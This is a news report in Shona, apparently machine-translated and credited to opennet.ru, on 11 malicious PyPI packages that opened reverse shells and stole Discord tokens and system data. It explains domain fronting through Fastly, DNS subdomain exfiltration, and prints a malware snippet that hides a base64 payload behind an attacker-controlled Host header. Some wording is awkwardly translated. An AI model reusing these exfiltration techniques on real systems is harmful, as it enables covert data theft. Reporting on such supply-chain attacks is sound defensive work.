MuPyPI (Python Package Index) dhairekitori, 11 mapakeji ane kodhi yakaipa akaonekwa. Matambudziko asati aonekwa, mapakeji akange atorwa zvakapetwa kanosvika zviuru makumi matatu nemasere. Iwo akaonekwa mapakeji ane hutsinye akakosha pakushandisa kwawo nzira dzakaomarara kuvanza nzira dzekutaurirana nemaseva evanorwisa.
- importantpackage (6305 downloads), yakakosha-package (12897) - yakamisa chinongedzo kune yekunze sevha pasi pechiratidziro chekubatanidza kune pypi.python.org kupa ganda kupinda kune system (reverse shell) uye yakashandisa trevorc2 chirongwa kuvanza iyo nzira yekukurukurirana.
- pptest (10001), ipboards (946) - yakashandisa DNS senzira yekutaurirana kuendesa ruzivo nezve system (mune yekutanga packet zita remuenzi, dhairekitori rekushanda, yemukati nekunze IP, mune yechipiri - zita remushandisi uye zita remuenzi) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - yakaratidza Discord service tokeni musystem ndokuitumira kune wekunze.
- trrfab (287) - yakatumira identifier, zita remuenzi uye zviri mukati me /etc/passwd, /etc/hosts,/home kune wekunze muenzi.
- 10Cent10 (490) - yakamisa reverse shell yekubatanidza neyekunze muenzi.
- yandex-yt (4183) - yakaratidza meseji nezve system iri kukanganisa uye inotungamirwa kune peji ine rumwe ruzivo nezve zvimwe zviito zvakaburitswa kuburikidza nda.ya.ru (api.ya.cc).
Kunyanya kucherechedzwa inzira yekuwana ekunze mauto anoshandiswa mupakeji yakakosha uye yakakosha-pakeji mapakeji, ayo akashandisa iyo Fastly content delivery network inoshandiswa muPyPI directory kuvanza basa ravo. Muchokwadi, zvikumbiro zvakatumirwa kune pypi.python.org sevha (kusanganisira kutsanangura zita rekuti python.org muSNI mukati mekukumbira kweHTTPS), asi iyo HTTP "Host" musoro waisanganisira zita revhavha inodzorwa nevanorwisa (sec. mberi.io. global.prod.fastly.net). Iyo yemukati yekutumira network yakatumira chikumbiro chakafanana kune inorwisa sevha, ichishandisa maparamita eiyo TLS yekubatanidza kune pypi.python.org kana uchitumira data.
PyPI infrastructure inofambiswa neFastly content delivery network, iyo inoshandisa transparent Varnish proxy kuchengetedza zvikumbiro zvakajairika uye inobata zvitupa zveTLS padanho reCDN, kwete pamaseva ekupedzisira, kuti iendese zvikumbiro zveHTTPS kuburikidza neproxy. Pasinei nehost yakanangana nayo, zvikumbiro zvinoendeswa kune proxy, iyo inosarudza host yaunoda uchishandisa "Host" HTTP header. mazita edomeini Masheya anoiswa paCDN load balancer IP addresses dzinowanikwa kune vese vatengi veFastly.
Sevha yemurwisi inonyoresawo neFastly CDN, iyo inopa zvirongwa zvemahara kune chero munhu uye inotobvumidza kunyoresa kusingazivikanwe. Zvinonyanya kukosha, reverse shell inoshandiswawo kutumira zvikumbiro kune anenge abatwa, asi inotangwa kubva kune anogamuchira. Kubva kunze, kutaurirana neseva yemurwisi kunoita semisangano yepamutemo nedhairekitori rePyPI, rakavharidzirwa uchishandisa Chitupa cheTLS PyPI. Imwe nzira yakafanana, inozivikanwa se "domain fronting," yaimboshandiswa zvakanyanya kuvanza mazita evanogamuchira mazita panguva yekudzivisa kuvharwa. Iyi nzira inoshandisa HTTPS access feature inopihwa nemamwe maCDN, ichitsanangura zita revanogamuchira mazita muSNI uye ichitotumira zita revanogamuchira mazita muHTTP Host header mukati meTLS session.
Kuvanza kuita kwakashata, TrevorC2 package yaishandiswawo kuita kudyidzana nesevha yakafanana neyakajairwa pawebhu navigation, semuenzaniso, zvikumbiro zvakashata zvakatumirwa pasi pekudhawunirodha mufananidzo "https://pypi.python.org/images/ guid=” neruzivo encoding muguid parameter. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
Iwo pptest uye ipboards mapakeji akashandisa imwe nzira yekuvanza network chiitiko, zvichibva pakukodha ruzivo runobatsira mumibvunzo kune DNS server. Iyo malware inotumira ruzivo nekuita zvikumbiro zveDNS senge "nu4timjagq4fimbuhe.example.com", umo iyo data inotumirwa kune control server inovharirwa uchishandisa iyo base64 fomati mune subdomain zita. Anorwisa anogamuchira aya mameseji nekudzora iyo DNS server yeiyo example.com domain.
Source: opennet.ru
